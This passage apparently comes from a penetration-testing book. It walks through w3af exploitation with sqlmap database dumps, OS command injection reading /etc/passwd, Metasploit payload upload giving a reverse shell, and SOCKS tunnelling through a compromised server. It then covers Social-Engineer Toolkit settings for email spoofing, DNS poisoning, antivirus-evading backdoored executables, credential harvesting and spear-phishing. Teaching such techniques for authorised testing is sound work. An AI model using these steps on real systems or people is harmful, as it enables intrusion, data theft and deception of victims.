fastexploit. This method should be used when the user has found a vulnerability manually and wants to exploit it using the framework. Here is an example of a fastexploit run: w3af>>> exploit w3af/exploit>>> exploit config sqlmap w3af/plugin/sqlmap>>> set url http://localhost/w3af/blindSqli/blindSqliinteger. php w3af/plugin/sqlmap>>> set injvar id w3af/plugin/sqlmap>>> set data id=1 w3af/plugin/sqlmap>>> back w3af/exploit>>> fastexploit sqlmap sqlmap coded by inquis and belch SQL injection could be verified, trying to create the DB driver. Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server. w3af/exploit/sqlmap>>> dump agenda w3af_test Database: w3af_test Table: agenda [2 entries] ++ + + + + | direccion | id | nombre | telefono | email | ++ + + + + | direccion 123 | 1 | apr | 52365786 | [email protected] | | direccion 333 | 2 | vico | 47998123 | [email protected] | ++ + + + + w3af/exploit/sqlmap>>>

Advanced exploiting techniques

The framework implements two highly advanced exploiting techniques that allow the user to keep escalating privileges into the remote network. Both of this techniques are used once the framework is able to execute remote operating system commands, this is the case of (for example) osCommanding, remoteFileIncludeShell and davShell attack plugins. These exploiting techniques are: ● Virtual daemon, allows you to use metasploit payloads to exploit the server that supports a vulnerable web application. ● w3afAgent, which creates a tunnel between the compromised server and w3af, the allow the user to route TCP connections through the remote server. Both of them are simple to use and configure using this guide. These features are under heavy development and are under no means stable, use them at your on risk.

Virtual daemon

As said before, this feature allows you to use metasploit payloads to exploit the server that supports a vulnerable web application. To use this feature you must have a working installation of the metasploit framework version 3.0 or greater; you can get it for free at www.metasploit.com , the installation and configuration of MSF is out of the scope of this document. To be able to use the virtual daemon you will need to run the following command in order to copy the w3af metasploit module into the MSF directory: ./w3af_console i /home/jdoe/tools/msf/ Where “/home/jdoe/tools/msf/” is the directory where the user “jdoe” installed Metasploit. In case you are interested, this is just a fancy shortcut for “cp core/controllers/vdaemon/w3af_vdaemon.rb /home/user/tools/msf/modules/exploits/unix/misc/”. Once this has been done, the user can start using the virtual daemon feature, before going through an example to see how to use the feature, we will make a summary of the steps that will happened during the exploitation: 1. w3af finds a vulnerability that allows remote command execution 2. The user exploits the vulnerability and starts the virtual daemon 3. The user starts the metasploit framework 4. The user configures the w3af module inside MSF and executes it 5. w3af module inside MSF will connect to the virtual daemon that is listening on localhost 6. MSF will send the payload selected by the user to the virtual daemon 7. The virtual daemon will create a PE(portable executable) or an ELF(executable and linkable format) file depending on the remote operating system, and using the exploited vulnerability it will upload and execute the payload in the remote server 8. The process of uploading the file to the remote server depends on the remote operating system, the privileges of the user running w3af and the local operating system; but in most cases the following happends: ● w3af sends a small executable to the remote server to perform an extrusion scan. ● w3af sniffs on the configured interface ( misc-settings -> interface ) for packets that arrive on the expected ports in order to verify outgoing firewall rules on the remote network ● If a TCP port is found to be allowed in the remote firewall, w3af will try to run a server on that port and make a reverse connection from the compromised host in order to download the PE/ELF generated file. If no TCP ports are enabled, w3af will send the ELF/PE file to the remote server using several calls to the “echo” command, which is rather slow, but should always work because it's an in-band transfer method. 9. The payload runs in the remote server and possibly connects back to the metasploit framework, that will handle the rest of the exploitation. Now that we know the theory, let's see an example of what this feature can do: $ ./w3af_console w3af>>> plugins w3af>>> plugins w3af/plugins>>> audit osCommanding w3af/plugins>>> audit Enabled audit plugins: osCommanding w3af/plugins>>> back w3af>>> target w3af/target>>> set target http://172.16.1.128/os.php?cmd=f00 w3af/target>>> back w3af>>> start The list of found URLs is: http:// 172.16.1.128/os.php Found 1 URLs and 1 different points of injection. The list of Fuzzable requests is: http:// 172.16.1.128/os.php | Method: GET | Parameters: (cmd) Starting osCommanding plugin execution. OS Commanding was found at: http://172.16.1.128/os.php . Using method: GET. The data sent was: cmd=type+%25SYSTEMROOT %25%5Cwin.ini The vulnerability was found in the request with id 7. w3af>>> exploit w3af/exploit>>> exploit osCommandingShell osCommanding exploit plugin is starting. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed. Vulnerability successfully exploited. Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server. w3af/exploit/osCommandingShell>>> start vdaemon Virtual daemon service is running on port 9091, use metasploit's w3af_vdaemon module to exploit it. w3af/exploit/osCommandingShell>>>

Nothing special for now, just added the new “start vdaemon” command. With this w3af run we have covered items 1. and 2. of the theory. The next step is to configure the MSF module and run it; my preferred way is to use metasploit's web interface “msfweb”. The first step is to click on the “Exploit” button on the main menu, a small window will appear, there you should search for w3af and then select the exploit named: “w3af virtual daemon exploit”. Some important points to have in mind while configuring the w3af agent virtual daemon module inside MSF: ● The target is of course the remote operating system you are exploiting ● VNC payloads don't seem to work ● RHOST parameter indicates the IP address of the server you are exploiting ● LHOST is your public IP address ● LPORT is a port where the remote web server can connect to (when using reverse connect payloads) or you can connect to ( when using bind payloads ) ● The w3af module inside metasploit will connect to localhost:9091 and do all the payload transfer, this parameters can't be configured and must not be confused with RHOST/LHOST and LPORT Once it has been configured, we can click on “Launch Exploit” to start the process, this is what we will see in the w3af console: w3af/exploit/osCommandingShell>>>

Please wait some seconds while w3af performs an extrusion scan. The extrusion test failed, no reverse connect transfer methods can be used. Trying inband echo transfer method. Error: The user running w3af can't sniff on the specified interface. Hints: Are you root? Does this interface exist? Successfully transfered the MSF payload to the remote server. Successfully executed the MSF payload on the remote server. The last messages are printed when you run w3af as a normal user, the reason is simple, when you run w3af as a user you can't sniff and therefore can't perform a successful extrusion scan. A successful extrusion scan would look like: Please wait some seconds while w3af performs an extrusion scan. ExtrusionServer listening on interface: eth1 Finished extrusion scan. The remote host: "172.10.10.1" can connect to w3af with these ports: 25/ TCP 80/ TCP 53/ TCP 1433/ TCP 8080/ TCP 53/ UDP 69/ UDP 139/ UDP 1025/ UDP The following ports are not bound to a local process and can be used by w3af: 25/ TCP 53/ TCP 1433/ TCP 8080/ TCP Selecting port "8080/TCP" for inbound connections from the compromised server to w3af. And if we take a look at the metasploit web interface we will find something far more interesting: [*] Started reverse handler [*] The remote IP address is: 172.16.1.128 [*] Using remote IP address to create payloads. [*] Sent payload to vdaemon. [*] The estimated time to wait for the extrusion scan to complete is: 1 seconds. [*] Done waiting! [*] The estimated time to wait for PE/ELF transfer is: 8 seconds. [*] Waiting... [*] Done waiting! [*] Going to wait for 27 seconds (waiting for crontab/at to execute payload). [*] The session could start before the handler, so please *be patient*. [*] Command shell session 1 opened (172.16.1.1:4444 > 172.16.1.128:1047) [*] Done waiting! [*] Starting handler Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 19852000 Microsoft Corp. C:\WINNT\system32> Now the user has an interactive shell with the privileges of the user running the web server, that can be used without any restrictions, you could even close w3af now and continue working directly from the metasploit shell. w3afAgent

As said before, this feature allows you to create a reverse tunnel that will route TCP connections through the compromised server. Unlike virtual daemon, these feature is ready to use and doesn't require any other software. Before going through an example to see how to use this feature, we will make a summary of the steps that will happened during exploitation: 1. w3af finds a vulnerability that allows remote command execution 2. The user exploits the vulnerability and starts the w3afAgent 3. w3af performs an extrusion scan by sending a small executable to the remote server. This executable connects back to w3af and allows the framework to identify outgoing firewall rules on the remote network. 4. w3afAgent Manager will send a w3afAgentClient to the remote server. The process of uploading the file to the remote server depends on the remote operating system, the privileges of the user running w3af and the local operating system; but in most cases the following happends: ● w3af reuses the information from the first extrusion scan, which was performed in step 3 in order to know which port it can use to listen for connections from the compromised server. ● If a TCP port is found to be allowed in the remote firewall, w3af will try to run a server on that port and make a reverse connection from the compromised in order to download the PE/ELF generated file. If no TCP ports are enabled, w3af will send the ELF/PE file to the remote server using several calls to the “echo” command, which is rather slow, but should always work because it's an in-band transfer method. 5. w3afAgent Manager starts the w3afAgentServer that will bind on localhost:1080 (which will be used by the w3af user) and on the interface configured in w3af ( misc-settings->interface ) on the port discovered during step 3. 6. The w3afAgentClient connects back to the w3afAgentServer, successfully creating the tunnel 7. The user configures the proxy listening on localhost:1080 on his preferred software 8. When the program connects to the socks proxy, all outgoing connections are routed through the compromised server Now that we know the theory, let's see an example of what this feature can do:

$ ./w3af_console w3af>>> plugins w3af/plugins>>> audit osCommanding w3af/plugins>>> audit Enabled audit plugins: osCommanding w3af/plugins>>> back w3af>>> target w3af/target>>> set target http://172.10.10.1/w3af/v.php?c=list w3af/target>>> back w3af>>> start The list of found URLs is: http:// 172.10.10.1/w3af/v.php Found 1 URLs and 1 different points of injection. The list of Fuzzable requests is: http:// 172.10.10.1/w3af/v.php | Method: GET | Parameters: (c) Starting osCommanding plugin execution. OS Commanding was found at: http://172.10.10.1/w3af/v.php . Using method: GET. The data sent was: c=%2Fbin%2Fcat+%2Fetc %2Fpasswd The vulnerability was found in the request with id 2. w3af>>> exploit w3af/exploit>>> exploit osCommandingShell osCommanding exploit plugin is starting. The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed. Vulnerability successfully exploited. Execute "exitPlugin" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.

Nothing really new until now, we configured w3af, started the scan and exploited the vulnerability. w3af/exploit/osCommandingShell>>> start w3afAgent

Initializing w3afAgent system, please wait. Please wait some seconds while w3af performs an extrusion scan. The extrusion scan failed. Error: The user running w3af can't sniff on the specified interface. Hints: Are you root? Does this interface exist? Using inbound port "5060" without knowing if the remote host will be able to connect back. The last messages are printed when you run w3af as a normal user, the reason is simple, when you run w3af as a user you can't sniff and therefor can't perform a successful extrusion scan. A successful extrusion scan would look like: Please wait some seconds while w3af performs an extrusion scan. ExtrusionServer listening on interface: eth1 Finished extrusion scan. The remote host: "172.10.10.1" can connect to w3af with these ports: 25/ TCP 80/ TCP 53/ TCP 1433/ TCP 8080/ TCP 53/ UDP 69/ UDP 139/ UDP 1025/ UDP The following ports are not bound to a local process and can be used by w3af: 25/ TCP 53/ TCP 1433/ TCP 8080/ TCP Selecting port "8080/TCP" for inbound connections from the compromised server to w3af. In both cases (superuser and user), these should be the following steps: Starting w3afAgentClient upload. Finished w3afAgentClient upload. Please wait 30 seconds for w3afAgentClient execution. w3afAgent service is up and running.

You may start using the w3afAgent that is listening on port 1080. All connections made through this SOCKS daemon will be relayed using the compromised server. And now, from another console we can use a socksClient to route connections through the compromised server:

$ nc 172.10.10.1 22 (UNKNOWN) [172.10.10.1] 22 (ssh) : Connection refused

$ python socksClient.py 127.0.0.1 22 SSH2.0OpenSSH_ 4.3p2 Debian8ubuntu1 Protocol mismatch.

$ cat socksClient.py import extlib.socksipy.socks as socks import sys s = socks.socksocket() s.setproxy(socks.PROXY_TYPE_SOCKS4,"localhost") s.connect((sys.argv[1],int(sys.argv[2]))) s.send('\n') print s.recv(1024)

I think this have given you an overview of a framework which is as handy as burp suite.

It is to be mentioned that in the section ‘I’ would mear Mr. Andres Riancho. Chapter 4:Social Engineering Tools

The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social- engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Beginning with the Social Engineer Toolkit

The brains behind SET is its configuration file. SET by default works perfect for most people however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory: root@bt:/pentest/exploits/SET# svn update U src/payloadgen/payloadgen.py U src/java_applet/Java.java U src/java_applet/jar_file.py U src/web_clone/cloner.py U src/msf_attacks/create_payload.py U src/harvester/scraper.py U src/html/clientside/gen_payload.py U src/html/web_server.py U src/arp_cache/arp_cache.py U set U readme/CHANGES Updated to revision 319. root@bt:/pentest/exploits/SET#

Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:

Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags: root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/pentest/exploits/framework3

Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path of where the location of Metasploit is. Metasploit is used for the payload creations, file format bugs, and for the browser exploit sections.

# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_INTERFACE=eth0 # # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap

The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.

# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES SENDMAIL=OFF

Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim’s SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If your using BackTrack 4, it is installed by default.

# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK WEBATTACK_EMAIL=OFF

When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.

# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun- java6-jdk SELF_SIGNED_APPLET=OFF

The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).

# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON

The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.

# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK # OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80. WEB_PORT=80

By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.

# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV # DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE # YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe CUSTOM_EXE=src/exe/legit.binary

When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag. # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF # THE ATTACK VECTOR APACHE_SERVER=OFF # # PATH TO THE APACHE WEBROOT APACHE_DIRECTORY=/var/www

The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF # # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! # SELF_SIGNED_CERT=OFF # # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem PEM_CLIENT=/root/newcert.pem PEM_SERVER=/root/newreq.pem

In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.

TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW # AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds WEBJACKING_TIME=2000

The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet. SET’s Menu

SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector. root@bt:/pentest/exploits/set# ./set

[---] The Social-Engineer Toolkit (SET) [---] [---] Written by David Kennedy (ReL1K) [---] [---] Version: 0.7 [---] [---] Codename: 'Swagger Wagon' [---] [---] Report bugs to: [email protected] [---] [---] Java Applet Written by: Thomas Werth [---] [---] Homepage: http://www.secmaniac.com [---] [---] Framework: http://www.social-engineer.org [---] [---] Over 1 million downloads and counting. [---]

Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs..

Follow me on Twitter: dave_rel1k

DerbyCon 2011 Sep29-Oct02 - A new era begins... irc.freenode.net - #DerbyCon - http://www.derbycon.com

Select from the menu:

1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7 Update the Metasploit Framework 8. Update the Social-Engineer Toolkit 9. Help, Credits, and About 10. Exit the Social-Engineer Toolkit

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack 2. Create a FileFormat Payload 3. Create a Social-Engineering Template 4. Return to Main Menu

Enter your choice:

The spear-phishing attack menu is used for performing targeted email attacks against a victim. You can send multiple emails based on what your harvested or you can send it to individuals. You can also utilize fileformat (for example a PDF bug) and send the malicious attack to the victim in order to hopefully compromise the system.

Select from the menu:

1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7 Update the Metasploit Framework 8. Update the Social-Engineer Toolkit 9. Help, Credits, and About 10. Exit the Social-Engineer Toolkit

Enter your choice: 2

The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a Metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate